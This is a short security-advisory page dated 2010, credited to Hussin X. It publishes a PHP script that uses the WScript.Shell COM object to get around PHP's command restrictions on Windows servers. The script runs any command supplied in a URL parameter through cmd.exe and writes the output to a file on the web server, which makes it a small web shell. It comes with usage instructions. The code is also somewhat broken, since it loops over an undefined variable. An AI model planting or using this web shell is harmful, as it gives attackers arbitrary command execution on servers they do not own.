Windows Scripts WScript.Shell - access bypass

2010.01.09
Credit: Hussin X
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

<?php // Windows Scripts Access Bypass Vulnerability // by : Hussin X // WwW.iq-ty.com<http://WwW.iq-ty.com> // use www.iq-ty.com/bypass.php?iq=dir<http://www.iq-ty.com/bypass.php?iq=dir> << or any commands // go to the iq-security.txt $iqsec = new COM("WScript.Shell"); $iqsec->Run('c:\windows\system32\cmd.exe /c '.escapeshellarg($_GET[iq]).' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/iq-security.txt'); for ($i=0; $i<count($iqhost); $i++) {echo nl2br(htmlentities($iqhost[$i]));} ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top